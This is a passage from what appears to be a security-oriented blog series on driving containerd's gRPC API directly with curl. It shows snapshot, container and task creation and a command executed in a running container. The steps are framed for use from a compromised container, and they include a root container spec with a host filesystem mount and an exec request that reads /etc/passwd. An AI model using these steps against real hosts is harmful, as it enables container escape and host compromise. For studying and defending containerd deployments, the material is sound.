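A sketch of pulling those values out of the config JSON, using a trimmed copy of the response above:

```python
import json

# Trimmed excerpt of the image config JSON returned above; the full
# document carries many more fields.
config_json = '''{
  "architecture": "amd64",
  "config": {
    "Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "NGINX_VERSION=1.14.2-1~stretch"],
    "Cmd": ["nginx", "-g", "daemon off;"]
  }
}'''

image_config = json.loads(config_json)["config"]
args = image_config["Cmd"]   # becomes the process args in the container spec
env = image_config["Env"]    # becomes the process env in the container spec
print(args, env)
```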
Create a snapshot to act as the container's filesystem
Now, using this, we need to create a snapshot for the container's storage. The snapshot protocol definition file can be used to view services relating to snapshots. It has a dependency on the mount.proto definition, so make sure you process this first as previously discussed.
These are the services supported in the protocol definition:
$ ./protobuf_parser.py -m snapshots_pb2.py
Services:
* /containerd.services.snapshots.v1.Snapshots/Prepare
Input: PrepareSnapshotRequest
Output: PrepareSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/View
Input: ViewSnapshotRequest
Output: ViewSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/Mounts
Input: MountsRequest
Output: MountsResponse
* /containerd.services.snapshots.v1.Snapshots/Commit
Input: CommitSnapshotRequest
Output: Empty
* /containerd.services.snapshots.v1.Snapshots/Remove
Input: RemoveSnapshotRequest
Output: Empty
* /containerd.services.snapshots.v1.Snapshots/Stat
Input: StatSnapshotRequest
Output: StatSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/Update
Input: UpdateSnapshotRequest
Output: UpdateSnapshotResponse
* /containerd.services.snapshots.v1.Snapshots/List
Input: ListSnapshotsRequest
Output: ListSnapshotsResponse
* /containerd.services.snapshots.v1.Snapshots/Usage
Input: UsageRequest
Output: UsageResponse
* /containerd.services.snapshots.v1.Snapshots/Cleanup
Input: CleanupRequest
Output: Empty
We want to create a snapshot, for which we use the /containerd.services.snapshots.v1.Snapshots/Prepare API call, which uses the PrepareSnapshotRequest and PrepareSnapshotResponse messages. The PrepareSnapshotRequest message looks as follows:
* PrepareSnapshotRequest
Fields:
snapshotter - string
key - string
parent - string
labels - LabelsEntry
Rough JSON example (might need tweaking):
{
"snapshotter": "string",
"key": "string",
"parent": "string",
"labels": LabelsEntry
}
Create a snapshot request like so:
$ cat preparesnapshotrequest.json
{"snapshotter": "overlayfs", "key": "nginx", "parent": "sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3"}
$ ./protobuf_parser.py -m snapshots_pb2.py -i preparesnapshotrequest.json -o preparesnapshotrequest.bin -t PrepareSnapshotRequest
Written to preparesnapshotrequest.bin
Send the request:
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.snapshots.v1.Snapshots/Prepare --data-binary @preparesnapshotrequest.bin --output preparesnapshotresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55faed8d7eb0)
> POST /containerd.services.snapshots.v1.Snapshots/Prepare HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 96
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [96 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [453 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now let's parse the response:
$ ./protobuf_parser.py -m snapshots_pb2.py -t PrepareSnapshotResponse -d preparesnapshotresponse.bin
mounts {
type: "overlay"
source: "overlay"
options: "index=off"
options: "workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/work"
options: "upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/fs"
options: "lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/290/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/289/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/288/fs"
}
This gives us the on-disk locations of the overlay filesystem layers, which we will use when we create a task later on.
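These same mount details need to be carried over into the rootfs field of the CreateTaskRequest later. Reshaping the parsed mounts into that JSON form can be scripted (a minimal sketch; the values are the ones returned in the response above):

```python
# Reshape the mounts from a PrepareSnapshotResponse into the "rootfs"
# list shape used later in createtaskrequest.json
def mounts_to_rootfs(mounts):
    return [{"type": m["type"], "source": m["source"], "options": m["options"]}
            for m in mounts]

# Values from the PrepareSnapshotResponse above
mounts = [{
    "type": "overlay",
    "source": "overlay",
    "options": [
        "index=off",
        "workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/work",
        "upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45575/fs",
        "lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/290/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/289/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/288/fs",
    ],
}]

rootfs = mounts_to_rootfs(mounts)
```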
Create the container
Now we want to create a container. The container protocol definition file can be used to view services relating to containers.
The list of services provided is as follows:
$ ./protobuf_parser.py -m containers_pb2.py
Services:
* /containerd.services.containers.v1.Containers/Get
Input: GetContainerRequest
Output: GetContainerResponse
* /containerd.services.containers.v1.Containers/List
Input: ListContainersRequest
Output: ListContainersResponse
* /containerd.services.containers.v1.Containers/ListStream
Input: ListContainersRequest
Output: ListContainerMessage
* /containerd.services.containers.v1.Containers/Create
Input: CreateContainerRequest
Output: CreateContainerResponse
* /containerd.services.containers.v1.Containers/Update
Input: UpdateContainerRequest
Output: UpdateContainerResponse
* /containerd.services.containers.v1.Containers/Delete
Input: DeleteContainerRequest
Output: Empty
We use the /containerd.services.containers.v1.Containers/Create call
, which uses the CreateContainerRequest
and CreateContainerResponse
messages. The CreateContainerRequest
message looks like the following:
* CreateContainerRequest
Fields:
container - Container
Rough JSON example (might need tweaking):
{
"container": {"id": "string", "labels": "LabelsEntry", "image": "string", "runtime": "Runtime", "spec": "Any", "snapshotter": "string", "snapshot_key": "string", "created_at": "Timestamp", "updated_at": "Timestamp", "extensions": "ExtensionsEntry", "sandbox": "string"}
}
To create the container we need to put together a container definition request. These are actually pretty complex, so I will break it up into separate parts to make it easier to understand. This is the basic structure of the request with the container spec (the most complex part) excluded. The structure below includes labels
taken from the docker.io/library/nginx:1.14.2
image definition that we looked up earlier, and snapshot
values referring to the snapshot we prepared.
$ cat container_template.json
{
"container": {
"id": "nginx",
"labels": {
"maintainer": "NGINX Docker Maintainers <[email protected]>",
"io.cri-containerd.image": "managed",
"io.containerd.image.config.stop-signal": "SIGTERM"
},
"image": "docker.io/library/nginx:1.14.2",
"runtime": {
"name": "io.containerd.runc.v2",
"options": {
"type_url": "containerd.runc.v1.Options"
}
},
"spec": {
"type_url": "types.containerd.io/opencontainers/runtime-spec/1/Spec",
"value": "CONTAINER_SPEC_HERE"
},
"snapshotter": "overlayfs",
"snapshot_key": "nginx"
}
}
The container specification, which will be inserted at the CONTAINER_SPEC_HERE
marker, will be based on the example I have available here. This container spec will create a container running as the root user with a host filesystem mount, and has most of its fields set to usable values. We just need to modify the args
and env
items in the process
section of the document. These will be filled in with data we take from the docker.io/library/nginx:1.14.2
image definition. The values we want are the Env
and Cmd
fields from the image definition.
The fields in the base template we need to fill in are at the very start of the template, and are shown in the extract below:
{"ociVersion": "1.1.0", "process": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": [], "env": [], "cwd": "/", "capabilities": {"bounding":
We want to take the following values from the image definition to fill in the args
and env
fields.
"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["nginx","-g","daemon off;"]
Once we have updated the args
and the env
fields, our completed container specification file containerspec.json
will start like the following:
{"ociVersion": "1.1.0", "process": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": ["nginx", "-g", "daemon off;"], "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "NGINX_VERSION=1.14.2-1~stretch", "NJS_VERSION=1.14.2.0.2.6-1~stretch"], "cwd": "/", "capabilities": {"bounding":
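Copying the Cmd and Env values from the image definition into the spec template can also be scripted rather than hand-edited (a minimal sketch; both dicts are trimmed to the relevant fields):

```python
import json

# Trimmed extract of the docker.io/library/nginx:1.14.2 image definition
image_config = {
    "Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
            "NGINX_VERSION=1.14.2-1~stretch",
            "NJS_VERSION=1.14.2.0.2.6-1~stretch"],
    "Cmd": ["nginx", "-g", "daemon off;"],
}

# Trimmed extract of the container spec template
spec = {"ociVersion": "1.1.0",
        "process": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]},
                    "args": [], "env": [], "cwd": "/"}}

# The image's Cmd becomes the process args; Env carries over directly
spec["process"]["args"] = image_config["Cmd"]
spec["process"]["env"] = image_config["Env"]

print(json.dumps(spec))
```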
Let's now merge our container template file container_template.json
with our container spec containerspec.json
into a combined file testcontainer.json
. This file will then be used to create a CreateContainerRequest
message.
$ python -c "open('testcontainer.json', 'w').write(open('container_template.json').read().replace('\"CONTAINER_SPEC_HERE\"', open('containerspec.json').read().rstrip('\n')))"
Now create the binary CreateContainerRequest
message using the JSON template we have created.
$ ./protobuf_parser.py -m containers_pb2.py -t CreateContainerRequest -i testcontainer.json -o createcontainerrequest.bin
Written to createcontainerrequest.bin
Now let's send the request:
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.containers.v1.Containers/Create --data-binary @createcontainerrequest.bin --output createcontainerresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x556615a10a10)
> POST /containerd.services.containers.v1.Containers/Create HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 23865
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [23865 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [23893 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Our container is now created. Now we need to start a task to make the container actually run.
Create and start a task
Now we want to create a task to make the container run. A task in the containerd context is essentially a process: either the primary one in a container (as defined in the container image definition) or a secondary process executing in an already running container. The tasks protocol definition file can be used to control tasks.
The list of services provided is as follows.
$ ./protobuf_parser.py -m tasks_pb2.py
Services:
* /containerd.services.tasks.v1.Tasks/Create
Input: CreateTaskRequest
Output: CreateTaskResponse
* /containerd.services.tasks.v1.Tasks/Start
Input: StartRequest
Output: StartResponse
* /containerd.services.tasks.v1.Tasks/Delete
Input: DeleteTaskRequest
Output: DeleteResponse
* /containerd.services.tasks.v1.Tasks/DeleteProcess
Input: DeleteProcessRequest
Output: DeleteResponse
* /containerd.services.tasks.v1.Tasks/Get
Input: GetRequest
Output: GetResponse
* /containerd.services.tasks.v1.Tasks/List
Input: ListTasksRequest
Output: ListTasksResponse
* /containerd.services.tasks.v1.Tasks/Kill
Input: KillRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Exec
Input: ExecProcessRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/ResizePty
Input: ResizePtyRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/CloseIO
Input: CloseIORequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Pause
Input: PauseTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Resume
Input: ResumeTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/ListPids
Input: ListPidsRequest
Output: ListPidsResponse
* /containerd.services.tasks.v1.Tasks/Checkpoint
Input: CheckpointTaskRequest
Output: CheckpointTaskResponse
* /containerd.services.tasks.v1.Tasks/Update
Input: UpdateTaskRequest
Output: Empty
* /containerd.services.tasks.v1.Tasks/Metrics
Input: MetricsRequest
Output: MetricsResponse
* /containerd.services.tasks.v1.Tasks/Wait
Input: WaitRequest
Output: WaitResponse
To create a task we use the /containerd.services.tasks.v1.Tasks/Create
service which uses the CreateTaskRequest
and CreateTaskResponse
messages. The CreateTaskRequest
message looks similar to the following:
* CreateTaskRequest
Fields:
container_id - string
rootfs - Mount
stdin - string
stdout - string
stderr - string
terminal - bool
checkpoint - Descriptor
options - Any
runtime_path - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"rootfs": {"type": "string", "source": "string", "target": "string", "options": "string"},
"stdin": "string",
"stdout": "string",
"stderr": "string",
"terminal": bool,
"checkpoint": {"media_type": "string", "digest": "string", "size": "int64", "annotations": "AnnotationsEntry"},
"options": {"type_url": "string", "value": "string"},
"runtime_path": "string"
}
This is what our task request will look like.
$ cat createtaskrequest.json
{
"container_id": "nginx",
"rootfs": [
{
"type": "overlay",
"source": "overlay",
"options": [
"index=off",
"workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45577/work",
"upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/45577/fs",
"lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/290/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/289/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/288/fs"
]
}
],
"stdin": "/run/containerd/fifo/3192704711/nginx-stdin",
"stdout": "/run/containerd/fifo/3192704711/nginx-stdout",
"stderr": "/run/containerd/fifo/3192704711/nginx-stderr"
}
In the above we reference the container we created earlier by its id, and the details of the snapshot we created earlier. We also reference a number of fifo files for the stdin, stdout and stderr streams of the process; these are files we need to create ourselves. If you happen to be executing these commands from inside a compromised container, remember that these paths are relative to the containerd host's filesystem, as they are the paths containerd itself uses. Also remember that, to be usable, these files need to be created in a location you can also access from wherever you are running your commands, although not necessarily at the same path (e.g. if you are running from within a compromised container).
Now we need to actually create the named pipes. In the example below, I'm again creating the files with filenames relative to the containerd host. If you were executing these commands from a container that accessed the containerd host filesystem via a mount at /host
, for example, you would prepend that value to the start of these paths.
$ sudo mkdir -p /run/containerd/fifo/3192704711/
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdin
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stdout
$ sudo mkfifo /run/containerd/fifo/3192704711/nginx-stderr
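If you are running from a compromised container that sees the host filesystem under a mount point, the same pipes can be created with a small helper that prepends a local prefix while keeping the host-relative names (a sketch; the prefix value, e.g. /host, is a hypothetical example that depends on your situation):

```python
import os

def make_task_fifos(host_dir, name, prefix=""):
    """Create stdin/stdout/stderr FIFOs for a task.

    host_dir is the directory as containerd sees it (what goes into the
    CreateTaskRequest); prefix is prepended for local access when the
    host filesystem is mounted elsewhere, e.g. "/host". Returns the
    locally accessible paths.
    """
    local_dir = prefix + host_dir
    os.makedirs(local_dir, exist_ok=True)
    local_paths = []
    for stream in ("stdin", "stdout", "stderr"):
        path = os.path.join(local_dir, f"{name}-{stream}")
        if not os.path.exists(path):
            os.mkfifo(path)
        local_paths.append(path)
    return local_paths
```

Calling make_task_fifos("/run/containerd/fifo/3192704711", "nginx") directly on the host reproduces the commands above.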
Now create the binary message file.
$ ./protobuf_parser.py -m tasks_pb2.py -t CreateTaskRequest -i createtaskrequest.json -o createtaskrequest.bin
Written to createtaskrequest.bin
Before sending the request using curl, we need to make sure that we read from the output named pipe files, otherwise the curl request will appear to hang and then eventually time out. We can do that via commands similar to the following, which need to be left running until the next curl command completes. Use multiple shells or background the processes to achieve this.
$ sudo tail -f /run/containerd/fifo/3192704711/nginx-stderr
$ sudo tail -f /run/containerd/fifo/3192704711/nginx-stdout
With those listeners running, send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Create --data-binary @createtaskrequest.bin --output createtaskresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x556426f579f0)
> POST /containerd.services.tasks.v1.Tasks/Create HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 597
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [597 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [16 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
We have created the task; now we want to start it. This uses the /containerd.services.tasks.v1.Tasks/Start
service and the StartRequest
and StartResponse
messages. The StartRequest
message looks like the following.
* StartRequest
Fields:
container_id - string
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"exec_id": "string"
}
Create a StartRequest
request message.
$ cat startrequest.json
{
"container_id": "nginx"
}
$ ./protobuf_parser.py -m tasks_pb2.py -t StartRequest -i startrequest.json -o startrequest.bin
Written to startrequest.bin
Now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Start --data-binary @startrequest.bin --output startresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x56323496d9f0)
> POST /containerd.services.tasks.v1.Tasks/Start HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 12
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [12 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [9 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now let's parse the response, which will give us the pid of the created task running our container.
$ ./protobuf_parser.py -m tasks_pb2.py -t StartResponse -d startresponse.bin
pid: 61152
We can confirm that the container is running by making a /containerd.services.tasks.v1.Tasks/List
request and searching the output for our new task.
$ echo -ne "\x00\x00\x00\x00\x00" | sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/List --data-binary @- --output listtasksresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x559442b45a00)
> POST /containerd.services.tasks.v1.Tasks/List HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 5
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [5 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [22521 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
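The echo in the command above supplies the 5-byte gRPC message frame for an empty ListTasksRequest: a compression flag of 0 followed by a big-endian 32-bit payload length of 0. For non-empty payloads the frame is built the same way (a sketch; the .bin files used elsewhere in this post are posted directly with curl, so they presumably already carry this frame):

```python
import struct

def grpc_frame(payload: bytes) -> bytes:
    """Prepend the gRPC wire frame: a 1-byte compressed flag (0 = not
    compressed) and a 4-byte big-endian payload length."""
    return struct.pack(">BI", 0, len(payload)) + payload

# An empty message frames to the five zero bytes the echo sends
assert grpc_frame(b"") == b"\x00\x00\x00\x00\x00"
```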
Parse the response and look for a matching entry with the name of our container and a matching pid. I've shown the command and the relevant extract of the output in the example below.
$ ./protobuf_parser.py -m tasks_pb2.py -d listtasksresponse.bin -t ListTasksResponse
[SNIP]
tasks {
id: "nginx"
pid: 61152
status: RUNNING
stdin: "/run/containerd/fifo/3192704711/nginx-stdin"
stdout: "/run/containerd/fifo/3192704711/nginx-stdout"
stderr: "/run/containerd/fifo/3192704711/nginx-stderr"
exited_at {
seconds: -62135596800
}
}
[SNIP]
Run a command in an existing container
To run a command in an existing container, we need to:
- Identify the id of the container in which we want to run the command
- Create a task
- Start the task
- Cleanup the task when complete
Create a task
For our example we will run our process inside the nginx container we created in the example above, but the process for listing running containers from part 2 can be used if you want to identify an already running container.
We use the /containerd.services.tasks.v1.Tasks/Exec
call for this, which has the ExecProcessRequest
message as an input.
It looks similar to the following:
* ExecProcessRequest
Fields:
container_id - string
stdin - string
stdout - string
stderr - string
terminal - bool
spec - Any
exec_id - string
Rough JSON example (might need tweaking):
{
"container_id": "string",
"stdin": "string",
"stdout": "string",
"stderr": "string",
"terminal": bool,
"spec": {"type_url": "string", "value": "string"},
"exec_id": "string"
}
Here's our working example.
$ cat execprocessrequest.json
{"container_id": "nginx", "stdin": "/run/containerd/fifo/2573972755/catpwd-stdin", "stdout": "/run/containerd/fifo/2573972755/catpwd-stdout", "stderr": "/run/containerd/fifo/2573972755/catpwd-stderr", "spec": {"type_url": "types.containerd.io/opencontainers/runtime-spec/1/Process", "value": {"user": {"uid": 0, "gid": 0, "additionalGids": [0]}, "args": ["cat", "/etc/passwd"], "env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", "NGINX_VERSION=1.14.2-1~stretch", "NJS_VERSION=1.14.2.0.2.6-1~stretch"], "cwd": "/", "capabilities": {"bounding": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE"], "effective": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", 
"CAP_CHECKPOINT_RESTORE"], "permitted": ["CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE", "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE"]}, "rlimits": [{"type": "RLIMIT_NOFILE", "hard": 1024, "soft": 1024}], "noNewPrivileges": true}}, "exec_id": "catpwd"}
Most of this can be used as standard boilerplate; you will, however, need to change the following fields:
- container_id - replace with the id of your target container
- std* - replace with fifo pipe filenames for the stdin, stdout and stderr files in an accessible location with filenames relative to the containerd host
- args - replace with a JSON formatted list of the command you want to run. We are running
cat /etc/passwd
in this case, expressed as ["cat", "/etc/passwd"]
- env - replace with the environment variables for the task - I've copied mine from the container definition as shown in the container creation example above, but this is not essential
- exec_id - replace with a string to uniquely identify the task (exec-ids were discussed in part 1 if you want more information)
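Those edits can also be applied programmatically to the boilerplate (a minimal sketch; the request dict is trimmed to the fields being changed, and build_exec_request is a hypothetical helper name):

```python
import copy

# Trimmed ExecProcessRequest boilerplate; the full version also carries
# the capability, rlimit and other process spec settings shown above
boilerplate = {
    "container_id": "",
    "stdin": "", "stdout": "", "stderr": "",
    "spec": {"type_url": "types.containerd.io/opencontainers/runtime-spec/1/Process",
             "value": {"args": [], "env": [], "cwd": "/"}},
    "exec_id": "",
}

def build_exec_request(container_id, exec_id, args, fifo_dir, env=None):
    req = copy.deepcopy(boilerplate)
    req["container_id"] = container_id
    req["exec_id"] = exec_id
    req["spec"]["value"]["args"] = args
    if env is not None:
        req["spec"]["value"]["env"] = env
    # fifo filenames relative to the containerd host, named after the exec id
    for stream in ("stdin", "stdout", "stderr"):
        req[stream] = f"{fifo_dir}/{exec_id}-{stream}"
    return req

req = build_exec_request("nginx", "catpwd", ["cat", "/etc/passwd"],
                         "/run/containerd/fifo/2573972755")
```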
Create a binary version of the message.
$ ./protobuf_parser.py -m tasks_pb2.py -i execprocessrequest.json -o execprocessrequest.bin -t ExecProcessRequest
Written to execprocessrequest.bin
Now we create the pipe files referenced in the message. Remember that these must refer to the same actual files as those named in the message, but specified relative to the location you are executing from (e.g. if the containerd host filesystem is mounted at /host
, add this to the start of the paths below).
$ sudo mkdir -p /run/containerd/fifo/2573972755/
$ sudo mkfifo /run/containerd/fifo/2573972755/catpwd-stdin
$ sudo mkfifo /run/containerd/fifo/2573972755/catpwd-stdout
$ sudo mkfifo /run/containerd/fifo/2573972755/catpwd-stderr
Now send the message.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.tasks.v1.Tasks/Exec --data-binary @execprocessrequest.bin --output execprocessresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55bd79e829f0)
> POST /containerd.services.tasks.v1.Tasks/Exec HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 2751
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [2751 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [5 bytes data]
